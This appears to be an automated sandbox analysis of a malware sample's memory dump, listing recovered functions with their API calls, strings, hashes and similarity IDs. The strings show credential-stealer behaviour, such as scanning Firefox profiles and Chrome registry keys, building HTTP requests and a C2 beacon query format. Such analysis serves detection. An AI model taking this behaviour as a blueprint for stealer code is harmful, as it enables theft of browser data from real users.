Part of subcall function 00CA3996: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00C9E13F,73797325), ref: 00CA39A7
Part of subcall function 00CA3996: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00CA39C1

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00C9E167
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00C9E17D
CloseHandle.KERNEL32(?), ref: 00C9E197
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00C9E1A4
lstrcat.KERNEL32(?,642E2A5C), ref: 00C9E1E9
FindFirstFileA.KERNEL32(?,?), ref: 00C9E1FE
CompareFileTime.KERNEL32(?,?), ref: 00C9E21C
FindNextFileA.KERNEL32(?,?), ref: 00C9E22F
FindClose.KERNEL32(?), ref: 00C9E23D
FindFirstFileA.KERNEL32(?,?), ref: 00C9E248
CompareFileTime.KERNEL32(?,?), ref: 00C9E268
StrChrA.SHLWAPI(?,0000002E), ref: 00C9E2A0
memcpy.NTDLL(?,?,00000000), ref: 00C9E2D6
FindNextFileA.KERNEL32(?,?), ref: 00C9E2EB
FindClose.KERNEL32(?), ref: 00C9E2F9
FindFirstFileA.KERNEL32(?,?), ref: 00C9E304
CompareFileTime.KERNEL32(?,?), ref: 00C9E314
FindClose.KERNEL32(?), ref: 00C9E34D
HeapFree.KERNEL32(00000000,?,73797325), ref: 00C9E360
HeapFree.KERNEL32(00000000,?), ref: 00C9E371

Strings

.dll, xrefs: 00C9E0D3

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
String ID: .dll
API String ID: 455834338-2738580789
Opcode ID: 00bdc0b992611cad8cd61cb4a3f7a69f500c91e1dcdf1c98aff702d144df45a0
Instruction ID: fea43ad2089e7f60490dc4d2add3a88f3221383b25a6d1f834d306b515827483
Opcode Fuzzy Hash: 00bdc0b992611cad8cd61cb4a3f7a69f500c91e1dcdf1c98aff702d144df45a0
Instruction Fuzzy Hash: E4812772508341AFDB10DF65DC48B6FBBE9BB98754F040A2EF595D2260E770DA08CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00CA888D, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 233stringfilesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

Part of subcall function 00C99689: ExpandEnvironmentStringsW.KERNEL32(00CB1384,00000000,00000000,00000001,00000000,00000000,?,00CB1384,00000000), ref: 00C996A0
Part of subcall function 00C99689: ExpandEnvironmentStringsW.KERNEL32(00CB1384,00000000,00000000,00000000), ref: 00C996BA

lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 00CA88D9
lstrlenW.KERNEL32(?,?,00000000), ref: 00CA88E5
memset.NTDLL ref: 00CA892D
FindFirstFileW.KERNEL32(00000000,00000000), ref: 00CA8948
lstrlenW.KERNEL32(0000002C), ref: 00CA8980
lstrlenW.KERNEL32(?), ref: 00CA8988
memset.NTDLL ref: 00CA89AB
wcscpy.NTDLL ref: 00CA89BD
PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00CA89E3
RtlEnterCriticalSection.NTDLL(?), ref: 00CA8A18

Part of subcall function 00CA4FB0: RtlFreeHeap.NTDLL(00000000,00000200,00CA6EB2,00000000,00000100,00000200), ref: 00CA4FBC

RtlLeaveCriticalSection.NTDLL(?), ref: 00CA8A34
FindNextFileW.KERNEL32(?,00000000), ref: 00CA8A4D
WaitForSingleObject.KERNEL32(00000000), ref: 00CA8A5F
FindClose.KERNEL32(?), ref: 00CA8A74
FindFirstFileW.KERNEL32(00000000,00000000), ref: 00CA8A88
lstrlenW.KERNEL32(0000002C), ref: 00CA8AAA
FindNextFileW.KERNEL32(?,00000000), ref: 00CA8B20
WaitForSingleObject.KERNEL32(00000000), ref: 00CA8B32
FindClose.KERNEL32(?), ref: 00CA8B4D

Strings

%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 00CA88CD

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
String ID: %APPDATA%\Mozilla\Firefox\Profiles
API String ID: 2962561936-3215297822
Opcode ID: 0a81443720d949598eb933a29205eb42a92e69dca3c1f2167ba1b681433f43b8
Instruction ID: f7ce87caee8eaec46c724396ee420d2884bf96ff7939b15cab5daef059e2c1ea
Opcode Fuzzy Hash: 0a81443720d949598eb933a29205eb42a92e69dca3c1f2167ba1b681433f43b8
Instruction Fuzzy Hash: 06818AB1504306AFC710AF64DC84B1BBBE9FF85308F044929F5A5962A2DB74DD08DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00C962FA, Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 361memoryCOMMON

Download Yara Rule

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00C96330
StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00C96362
StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00C96394
StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00C963C6
StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00C963F8
StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00C9642A
StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00C9645C
StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00C9648E
StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00C964C0
HeapFree.KERNEL32(00000000,?,Scr,?,?,747DF710,00000000,00000000,?,?,00CB58C6,?,?), ref: 00C96523

Part of subcall function 00CA84CA: RtlEnterCriticalSection.NTDLL(07D18D20), ref: 00CA84D3
Part of subcall function 00CA84CA: HeapFree.KERNEL32(00000000,00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00CA8505
Part of subcall function 00CA84CA: RtlLeaveCriticalSection.NTDLL(07D18D20), ref: 00CA8523

StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00C9654E

Strings

Scr, xrefs: 00C96502

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CriticalFreeHeapSection$EnterLeave
String ID: Scr
API String ID: 1298188129-1633706383
Opcode ID: 3eb6f73209262ce0a947c017e39e597451d3bac5f8c28b0ba3579d2eb015ffb2
Instruction ID: 8f0bb324c944f49dfb485fbfb59f58f4467d25d0ffc521f1196beafc4f054ced
Opcode Fuzzy Hash: 3eb6f73209262ce0a947c017e39e597451d3bac5f8c28b0ba3579d2eb015ffb2
Instruction Fuzzy Hash: B2B1D5B17102126BCF20EFB5DC8DFAF26DC6B09740B194924B816C7295EA70DE01ABB1

Uniqueness

Uniqueness Score: -1.00%

Function 00C945FF, Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00C94632
GetLastError.KERNEL32 ref: 00C94640
NtSetInformationProcess.NTDLL ref: 00C9469A
GetProcAddress.KERNEL32(456C7452,00000000), ref: 00C946D9
GetProcAddress.KERNEL32(61657243), ref: 00C946FA
TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 00C94751
CloseHandle.KERNEL32(?), ref: 00C94767
CloseHandle.KERNEL32(?), ref: 00C9478D

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
String ID:
API String ID: 3529370251-0
Opcode ID: 4c0f9ed74db371518039f10093a37679f0facd7666163b044a8a649d17774b66
Instruction ID: 752c9747942390b11490643e9ee5aba856cdd349d04a08b48998c946cf662026
Opcode Fuzzy Hash: 4c0f9ed74db371518039f10093a37679f0facd7666163b044a8a649d17774b66
Instruction Fuzzy Hash: 7F41A070108349AFDB04AF65DC88F6FBBF9FB89748F040A29F55492160D7B0CA49DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CB4FE1, Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,00C923F9,00000000), ref: 00CB4FF9

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

FindFirstFileW.KERNEL32(?,00000000), ref: 00CB5062
lstrlenW.KERNEL32(0000002C), ref: 00CB508A
RemoveDirectoryW.KERNEL32(?), ref: 00CB50DC
DeleteFileW.KERNEL32(?), ref: 00CB50E7
FindNextFileW.KERNEL32(00000000,00000000), ref: 00CB50FA

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
String ID:
API String ID: 499515686-0
Opcode ID: 3fb7d16daa0bcc1378ce5711fdc9de394c71ec20e93454589760bc0cef41b17e
Instruction ID: 33ab8069d2fd8f87ad7ab57bd19951e678a8c3c5232c621ff48d74878988e8fd
Opcode Fuzzy Hash: 3fb7d16daa0bcc1378ce5711fdc9de394c71ec20e93454589760bc0cef41b17e
Instruction Fuzzy Hash: 0D412971900609EFDF11AFA8ED45BEEBFB9EF04348F2041A5E911A6161DB718B44EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CA956E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 105stringnativeCOMMON

Download Yara Rule

APIs

NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 00CA95BD
lstrlenW.KERNEL32(?), ref: 00CA95CB
NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 00CA95F6
lstrcpyW.KERNEL32(00000006,00000000), ref: 00CA9623

Strings

DelegateExecute, xrefs: 00CA9595
SOFTWARE\Classes\Chrome, xrefs: 00CA963A

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Query$lstrcpylstrlen
String ID: DelegateExecute$SOFTWARE\Classes\Chrome
API String ID: 3961825720-1743081400
Opcode ID: 2a59fc4c05eb97a66005f7f67b501f59819f423223e6affab167426b270c00f5
Instruction ID: 6358c630592369b8923f5e3cd73a9f67d466326edcabb974153caff21cd5ab43
Opcode Fuzzy Hash: 2a59fc4c05eb97a66005f7f67b501f59819f423223e6affab167426b270c00f5
Instruction Fuzzy Hash: 74313A7150020AFFDF119FA8DD86A9EBBB8FF05318F108129F911A6260DB71DE51EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CB298D, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00CB29AF

Part of subcall function 00C99DAC: NtAllocateVirtualMemory.NTDLL(00CB29D7,00000000,00000000,00CB29D7,00003000,00000040), ref: 00C99DDD
Part of subcall function 00C99DAC: RtlNtStatusToDosError.NTDLL(00000000), ref: 00C99DE4
Part of subcall function 00C99DAC: SetLastError.KERNEL32(00000000), ref: 00C99DEB

GetLastError.KERNEL32(?,00000318,00000008), ref: 00CB2ABF

Part of subcall function 00CA4C67: RtlNtStatusToDosError.NTDLL(00000000), ref: 00CA4C7F

memcpy.NTDLL(00000218,00CB6E10,00000100,?,00010003,?,?,00000318,00000008), ref: 00CB2A3E
RtlNtStatusToDosError.NTDLL(00000000), ref: 00CB2A98

Strings

, xrefs: 00CB2A05

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
String ID:
API String ID: 2966525677-3916222277
Opcode ID: b8e1c97f619beeb1be4e6e700962542f701fe07d6de234698227f2afda0db136
Instruction ID: 007ff798539d1dda50c1068deb491e3c1b51e187cae9dad83288c2e9cca35b9a
Opcode Fuzzy Hash: b8e1c97f619beeb1be4e6e700962542f701fe07d6de234698227f2afda0db136
Instruction Fuzzy Hash: 0E318D71901209AFDB31DFA4DD89BEAB7B8FB04704F14456AE519E7240EB30AF44EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CAED4B, Relevance: 7.9, APIs: 6, Instructions: 399COMMON

Download Yara Rule

APIs

Part of subcall function 00CA5393: memset.NTDLL ref: 00CA53B3

Part of subcall function 00CA5393: memset.NTDLL ref: 00CA54E7
Part of subcall function 00CA5393: memset.NTDLL ref: 00CA54FC

memcpy.NTDLL(?,00008F12,0000011E), ref: 00CAEDD0
memset.NTDLL ref: 00CAEE06
memset.NTDLL ref: 00CAEE54
memset.NTDLL ref: 00CAEED3
memset.NTDLL ref: 00CAEF42
memset.NTDLL ref: 00CAF012

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 84263b50ac621e21acb80b1d1a0c955a35f435620c8261cf45ed5eedcad43666
Instruction ID: cbcb363ea226f6586e8e7dac86a9fe968d246ee656ce4902c97bdbddcdf081e9
Opcode Fuzzy Hash: 84263b50ac621e21acb80b1d1a0c955a35f435620c8261cf45ed5eedcad43666
Instruction Fuzzy Hash: 43F1E470500B9ACFDB31CFA9C9946AABBF0FF52308F14496DC5E796642D331AA46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C91E8A, Relevance: 51.4, APIs: 34, Instructions: 399synchronizationtimethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA39D7: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 00CA3A0B
Part of subcall function 00CA39D7: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 00CA3ACC
Part of subcall function 00CA39D7: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 00CA3AD5

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 00C91F28

Part of subcall function 00C93828: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 00C93842
Part of subcall function 00C93828: CreateWaitableTimerA.KERNEL32(00CBE0D4,00000003,?), ref: 00C9385F
Part of subcall function 00C93828: GetLastError.KERNEL32(?,?,00CA3A3F,?,?,?,00000000,?,?,?), ref: 00C93870
Part of subcall function 00C93828: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00CA3A3F,?,?,?,00CA3A3F,?), ref: 00C938B0
Part of subcall function 00C93828: SetWaitableTimer.KERNEL32(00000000,00CA3A3F,00000000,00000000,00000000,00000000,?,?,00CA3A3F,?), ref: 00C938CF
Part of subcall function 00C93828: HeapFree.KERNEL32(00000000,00CA3A3F,00000000,00CA3A3F,?,?,?,00CA3A3F,?), ref: 00C938E5

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 00C91F8B
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00C9200B
WaitForMultipleObjects.KERNEL32(00008005,?,00000000,000000FF), ref: 00C920B0

Part of subcall function 00CA08B3: RtlAllocateHeap.NTDLL(00000000,00000010,747DF730), ref: 00CA08D5
Part of subcall function 00CA08B3: HeapFree.KERNEL32(00000000,00000000,00000129,00000000,00000000,?,?,?,?,00C91F61,?), ref: 00CA0906

WaitForSingleObject.KERNEL32(?,00000000,?), ref: 00C920E5
WaitForSingleObject.KERNEL32(?,00000000), ref: 00C920F4
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00C92121
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 00C9213B
_allmul.NTDLL(00000258,00000000,FF676980,000000FF), ref: 00C92183
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000258,00000000,FF676980,000000FF,00000000), ref: 00C9219D
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00C921B3
ReleaseMutex.KERNEL32(?), ref: 00C921D0
WaitForSingleObject.KERNEL32(?,00000000), ref: 00C921E1
WaitForSingleObject.KERNEL32(?,00000000), ref: 00C921F0
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00C92224
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 00C9223E
SwitchToThread.KERNEL32 ref: 00C92240
ReleaseMutex.KERNEL32(?), ref: 00C9224A
WaitForSingleObject.KERNEL32(?,00000000), ref: 00C92288

Part of subcall function 00C9AC31: RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 00C9AC4F
Part of subcall function 00C9AC31: RegQueryValueExA.ADVAPI32(?,Main,00000000,747DF710,00000000,?,747DF710,00000000), ref: 00C9AC74
Part of subcall function 00C9AC31: RtlAllocateHeap.NTDLL(00000000,?), ref: 00C9AC85
Part of subcall function 00C9AC31: RegQueryValueExA.ADVAPI32(?,Main,00000000,00000000,00000000,?), ref: 00C9ACA0
Part of subcall function 00C9AC31: HeapFree.KERNEL32(00000000,?), ref: 00C9ACBE
Part of subcall function 00C9AC31: RegCloseKey.ADVAPI32(?), ref: 00C9ACC7

WaitForSingleObject.KERNEL32(?,00000000), ref: 00C92293
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00C922B6
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 00C922D0
SwitchToThread.KERNEL32 ref: 00C922D2
ReleaseMutex.KERNEL32(?), ref: 00C922DC
WaitForSingleObject.KERNEL32(?,00000000), ref: 00C922F1
CloseHandle.KERNEL32(?), ref: 00C9233F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00C92353
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00C9235F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00C9236B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00C92377
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00C92383
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00C9238F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00C9239B
RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 00C923AA

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Wait$Close$Handle$ObjectSingleTimerWaitable$HeapMultipleObjects$MutexRelease_allmul$FreeThread$AllocateCreateErrorLastOpenQuerySwitchTimeValue$EventExitFileSystemUser
String ID:
API String ID: 3804754466-0
Opcode ID: ad1bccd3b8fbcce3b84622a70d363c963225c9bcf0c042b4d32aa1921b3edd49
Instruction ID: 1f4e83b8851f36ec220073682debad3004ed7f513e309542d3db04a40f0e1089
Opcode Fuzzy Hash: ad1bccd3b8fbcce3b84622a70d363c963225c9bcf0c042b4d32aa1921b3edd49
Instruction Fuzzy Hash: E9E18D71408345BFDB11AF68DC85A6EBBECFB84354F040A29F5E5921B0EB708D45DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CB0228, Relevance: 47.6, APIs: 15, Strings: 12, Instructions: 378memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(,00000000,?,?), ref: 00CB0280
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00CB031A
lstrcpyn.KERNEL32(00000000,?,?), ref: 00CB032F
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00CB034B
StrChrA.SHLWAPI(?,00000020,?,?), ref: 00CB0426
StrChrA.SHLWAPI(00000001,00000020), ref: 00CB0437
lstrlen.KERNEL32(00000000), ref: 00CB044B
memmove.NTDLL(?,?,00000001), ref: 00CB045B
lstrlen.KERNEL32(?,?,?), ref: 00CB047E
RtlAllocateHeap.NTDLL(00000000,?), ref: 00CB04A4
memcpy.NTDLL(00000000,?,?), ref: 00CB04B8
memcpy.NTDLL(?,?,?), ref: 00CB04D8
HeapFree.KERNEL32(00000000,?), ref: 00CB0514
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00CB05DA
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 00CB0622

Strings

gzip, deflate, xrefs: 00CB0466
OPTI, xrefs: 00CB0262
Content-Type:, xrefs: 00CB0386
Accept-Encoding:, xrefs: 00CB046B
User-Agent:, xrefs: 00CB02F9
, xrefs: 00CB027B, 00CB02AC
GET , xrefs: 00CB0413
PUT , xrefs: 00CB0254
OPTI, xrefs: 00CB041B
POST, xrefs: 00CB025B
GET , xrefs: 00CB024D
ocsp, xrefs: 00CB0393

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
String ID: $ gzip, deflate$Accept-Encoding:$Content-Type:$GET $GET $OPTI$OPTI$POST$PUT $User-Agent:$ocsp
API String ID: 3227826163-537135598
Opcode ID: 08d5105e30d29bf87c2ac7d9b5cedced65a22942953ee06dc0a6702d00aaf3f7
Instruction ID: bfe48f9c35b96c4d961fe904591b243ff3af829cf6d0201c101d1818b52be2fe
Opcode Fuzzy Hash: 08d5105e30d29bf87c2ac7d9b5cedced65a22942953ee06dc0a6702d00aaf3f7
Instruction Fuzzy Hash: 30D14B31A00205AFDB25DFA8CC89BAE7BB5FF04340F244168F915AB2A1DB70EE55DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00C953D6, Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 284memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00C9540E
wsprintfA.USER32 ref: 00C95471
wsprintfA.USER32 ref: 00C954BA
wsprintfA.USER32 ref: 00C954DE
lstrcat.KERNEL32(?,726F7426), ref: 00C95518
wsprintfA.USER32 ref: 00C95537
wsprintfA.USER32 ref: 00C95550
wsprintfA.USER32 ref: 00C95574
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00C95591
RtlEnterCriticalSection.NTDLL(07D18D20), ref: 00C955B2
RtlLeaveCriticalSection.NTDLL(07D18D20), ref: 00C955D2

Part of subcall function 00CAA378: lstrlen.KERNEL32(00000000,00000000,747C81D0,00000000,?,?,00CB4BA0,00000000,07D18D60), ref: 00CAA3A3
Part of subcall function 00CAA378: lstrlen.KERNEL32(?,?,?,00CB4BA0,00000000,07D18D60), ref: 00CAA3AB
Part of subcall function 00CAA378: strcpy.NTDLL ref: 00CAA3C2
Part of subcall function 00CAA378: lstrcat.KERNEL32(00000000,?), ref: 00CAA3CD
Part of subcall function 00CAA378: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00CB4BA0,00000000,07D18D60), ref: 00CAA3EA

StrTrimA.SHLWAPI(00000000,00CB83E4,?,07D18D60), ref: 00C95606

Part of subcall function 00CAA587: lstrlen.KERNEL32(?,00000000,747C81D0,00CB4BD7,612E002F,00000000), ref: 00CAA593
Part of subcall function 00CAA587: lstrlen.KERNEL32(?), ref: 00CAA59B
Part of subcall function 00CAA587: lstrcpy.KERNEL32(00000000,?), ref: 00CAA5B2
Part of subcall function 00CAA587: lstrcat.KERNEL32(00000000,?), ref: 00CAA5BD

lstrcpy.KERNEL32(?,00000000), ref: 00C95635
lstrcat.KERNEL32(?,?), ref: 00C95643
lstrcat.KERNEL32(?,?), ref: 00C9564D
RtlEnterCriticalSection.NTDLL(07D18D20), ref: 00C95658
RtlLeaveCriticalSection.NTDLL(07D18D20), ref: 00C95674

Part of subcall function 00C9F02B: memset.NTDLL ref: 00C9F064
Part of subcall function 00C9F02B: memcpy.NTDLL(?,?,00000090,00000000,00000000,0000009F,0000009F,?,00000090,?), ref: 00C9F070

HeapFree.KERNEL32(00000000,?,?,?,?,07D18D60,00000001), ref: 00C9573A
HeapFree.KERNEL32(00000000,?,00CC044E,?), ref: 00C9574C
HeapFree.KERNEL32(00000000,?,?,07D18D60), ref: 00C9575E
HeapFree.KERNEL32(00000000,00000000), ref: 00C95770
HeapFree.KERNEL32(00000000,?), ref: 00C95782

Strings

EMPTY, xrefs: 00C953E0
version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s, xrefs: 00C9546B

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$wsprintf$Freelstrcat$CriticalSectionlstrlen$AllocateEnterLeaveTrimlstrcpy$memcpymemsetstrcpy
String ID: EMPTY$version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
API String ID: 1483892062-304588751
Opcode ID: 3181d8123a14d4ed1209a13f16621f4ffb096959b162855c615775c0a3b777f3
Instruction ID: 6faf89c3e22f6c94700cb3b7a4d57aec46ef92fe13db21f37d1e70307ad392a8
Opcode Fuzzy Hash: 3181d8123a14d4ed1209a13f16621f4ffb096959b162855c615775c0a3b777f3
Instruction Fuzzy Hash: 4EB16A71604201AFDB02DF68EC84F9E7BE9FB88704F140629F549D7261D730EA19DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00CB4970, Relevance: 39.3, APIs: 26, Instructions: 260memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00CB4991
GetTickCount.KERNEL32 ref: 00CB49AB
wsprintfA.USER32 ref: 00CB49FE
QueryPerformanceFrequency.KERNEL32(?), ref: 00CB4A0A
QueryPerformanceCounter.KERNEL32(?), ref: 00CB4A15
_aulldiv.NTDLL(?,?,?,?), ref: 00CB4A2B
wsprintfA.USER32 ref: 00CB4A41
wsprintfA.USER32 ref: 00CB4A5F
wsprintfA.USER32 ref: 00CB4A76
wsprintfA.USER32 ref: 00CB4A97
wsprintfA.USER32 ref: 00CB4AD2
wsprintfA.USER32 ref: 00CB4AF6
lstrcat.KERNEL32(?,726F7426), ref: 00CB4B2E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00CB4B48
GetTickCount.KERNEL32 ref: 00CB4B58
RtlEnterCriticalSection.NTDLL(07D18D20), ref: 00CB4B6C
RtlLeaveCriticalSection.NTDLL(07D18D20), ref: 00CB4B8A
StrTrimA.SHLWAPI(00000000,00CB83E4,00000000,07D18D60), ref: 00CB4BBF
lstrcpy.KERNEL32(00000000,00000000), ref: 00CB4BEB
lstrcat.KERNEL32(00000000,?), ref: 00CB4BF6
lstrcat.KERNEL32(00000000,00000000), ref: 00CB4BFA
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000), ref: 00CB4C7B
HeapFree.KERNEL32(00000000,00000000,612E002F,00000000), ref: 00CB4C8A
HeapFree.KERNEL32(00000000,00000000,00000000,07D18D60), ref: 00CB4C99
HeapFree.KERNEL32(00000000,00000000), ref: 00CB4CAB
HeapFree.KERNEL32(00000000,?), ref: 00CB4CBD

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heapwsprintf$Free$lstrcat$AllocateCountCriticalPerformanceQuerySectionTick$CounterEnterFrequencyLeaveTrim_aulldivlstrcpy
String ID:
API String ID: 2878544442-0
Opcode ID: 548d338b8748ff7950b77c981843d158b1692019a8de581c3e871e5a5676aec3
Instruction ID: a54a488ee7c7130f8e59156e9f54881de79733c5b298a47b05479d14fbc34c05
Opcode Fuzzy Hash: 548d338b8748ff7950b77c981843d158b1692019a8de581c3e871e5a5676aec3
Instruction Fuzzy Hash: EFA13871504205AFDB01EFA8EC84FAE3BE9FB48744F140625F609D3262EB70E959DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C9CE48, Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,00C91CDF,00000000,00000000,?,?,00000000,?,?,?,00C91CDF,TorClient), ref: 00CA6765
Part of subcall function 00CA672D: RtlAllocateHeap.NTDLL(00000000,00C91CDF), ref: 00CA6779
